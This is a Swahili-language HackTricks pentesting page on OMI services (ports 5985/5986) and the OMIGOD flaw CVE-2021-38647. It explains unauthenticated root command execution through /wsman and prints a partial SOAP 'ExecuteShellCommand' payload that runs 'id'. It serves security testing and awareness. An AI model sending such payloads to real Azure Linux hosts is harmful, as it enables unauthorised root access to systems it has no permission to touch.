4.6 KiB
5985,5986 - Kupima Usalama wa OMI
Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)!
- Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF? Angalia MPANGO WA KUJIUNGA!
- Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
- Pata swag rasmi ya PEASS & HackTricks
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au nifuatilie kwenye Twitter 🐦@carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye repo ya hacktricks na repo ya hacktricks-cloud.
Taarifa Msingi
OMI inawakilishwa kama chombo cha chanzo wazi kilichoundwa na Microsoft, kwa ajili ya usimamizi wa usanidi wa kijijini. Ni muhimu sana kwa seva za Linux kwenye Azure ambazo hutumia huduma kama vile:
- Azure Automation
- Azure Automatic Update
- Azure Operations Management Suite
- Azure Log Analytics
- Azure Configuration Management
- Azure Diagnostics
Mchakato wa omiengine
unaanzishwa na kusikiliza kwenye interface zote kama root wakati huduma hizi zinapoamilishwa.
Bandari za chaguo-msingi zinazotumiwa ni 5985 (http) na 5986 (https).
CVE-2021-38647 Udhaifu
Kama ilivyoonekana tarehe 16 Septemba, seva za Linux zilizowekwa kwenye Azure na huduma zilizotajwa ziko hatarini kutokana na toleo lenye udhaifu la OMI. Udhaifu huu unapatikana katika namna OMI server inavyoshughulikia ujumbe kupitia kielelezo cha /wsman
bila kuhitaji kichwa cha Uthibitishaji, kuidhinisha mteja kwa njia isiyosahihi.
Mshambuliaji anaweza kutumia hii kwa kutuma mzigo wa SOAP wa "ExecuteShellCommand" bila kichwa cha Uthibitishaji, kuwalazimisha seva kutekeleza amri kwa mamlaka ya root.
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
Kwa habari zaidi kuhusu CVE hii angalia hapa.
Marejeo
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
- https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
- Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia MPANGO WA KUJIUNGA!
- Gundua The PEASS Family, mkusanyiko wetu wa kipekee wa NFTs
- Pata swag rasmi ya PEASS & HackTricks
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au nifuate kwenye Twitter 🐦@carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye repo ya hacktricks na repo ya hacktricks-cloud.